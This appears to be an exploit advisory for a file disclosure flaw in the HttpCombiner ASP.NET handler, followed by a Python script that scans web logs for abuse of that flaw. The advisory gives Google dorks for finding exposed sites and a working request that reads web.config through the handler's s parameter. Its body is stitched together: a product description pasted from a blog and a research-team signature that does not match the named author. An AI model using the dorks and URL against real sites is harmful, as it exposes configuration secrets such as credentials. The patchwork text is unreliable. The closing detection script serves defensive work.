# Exploit Title: HttpCombiner ASP.NET Remote File Disclosure Vulnerability
# Google Dork: [filetype:txt intext:HttpCombiner.ashx]
# Date: 2014-10-10
# Exploit Author: Hoang Anh Thai
# Vendor Homepage: https://myfirstsamplepagebyilyasforassign.googlecode.com/files/HttpCombiner-v1.zip
# Reference: http://www.codeproject.com/KB/aspnet/HttpCombine.aspx
# Affected Versions: HttpCombiner v1.0
# Tested on: Windows 7 / Chrome & Internet Explorer
You can reduce the wait time by using a CDN. Read my previous blog post about using CDN. However, a better solution is to deliver multiple files over one request using an HttpHandler that combines several files and delivers them as one output. So, instead of putting many <script> or <link> tags, you just put one <script> and one <link> tag, and point them to the HttpHandler. You tell the handler which files to combine and it delivers those files in one response. This saves the browser from making many requests and eliminates the latency.
This Http Handler reads the file names defined in a configuration, combines all those files, and delivers them as one response. It delivers the response gzip-compressed to save bandwidth. Moreover, it generates proper cache headers to cache the response in the browser cache, so that the browser does not request it again on future visits.
Google search: [inurl:robots.txt intext:HttpCombiner.ashx]
Result: The robots.txt file contains the entry "...Disallow: /css/HttpCombiner.ashx..."
Exploit (view the source of web.config): http://[host]/css/HttpCombiner.ashx?s=~/web.config&t=text/xml
VULNERABILITY LABORATORY RESEARCH TEAM
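
To check whether a site has already received requests of this kind, the web server logs can be scanned for handler calls whose `s` parameter names anything other than a script or stylesheet. The following is an added detection example, not code from the advisory or from HttpCombiner. It assumes a simplified log layout (method, path, query, client IP, status), a comma-separated file list in `s`, and `.js`/`.css` as the only legitimate extensions; the sample log lines are constructed.

```python
from urllib.parse import parse_qs, unquote

HANDLER = "httpcombiner.ashx"
ALLOWED_EXT = (".js", ".css")   # assumption: the only types the handler should serve

# Constructed sample log lines: method, path, query, client IP, status.
SAMPLE_LOG = """\
GET /css/HttpCombiner.ashx s=~/css/site.css,~/css/print.css&t=text/css 198.51.100.7 200
GET /css/HttpCombiner.ashx s=~/web.config&t=text/xml 203.0.113.9 200
GET /css/HttpCombiner.ashx s=%7E%2Fscripts%2Fapp.js&t=text/javascript 198.51.100.7 200
GET /css/HttpCombiner.ashx s=~/css/site.css,..%252fweb.config&t=text/css 203.0.113.9 200
GET /default.aspx - 198.51.100.7 200
"""

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded paths are compared in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_files(query):
    """Return the entries of the s parameter that are not plain .js/.css paths."""
    params = parse_qs(query, keep_blank_values=True)
    flagged = []
    for raw in params.get("s", []):
        for item in decode_fully(raw).split(","):
            path = item.strip().lower().replace("\\", "/")
            if not path.endswith(ALLOWED_EXT) or ".." in path or ":" in path:
                flagged.append(item.strip())
    return flagged

def scan(log_text):
    """Return (client_ip, flagged_files) for each suspicious handler request."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or not fields[1].lower().endswith(HANDLER):
            continue
        flagged = suspicious_files(fields[2])
        if flagged:
            hits.append((fields[3], flagged))
    return hits

if __name__ == "__main__":
    for ip, files in scan(SAMPLE_LOG):
        print(ip, files)
```

The same extension and traversal test, applied inside the handler before any file is read, is the corresponding server-side fix; for real IIS logs, adjust the field positions in `scan` to match the `#Fields:` header.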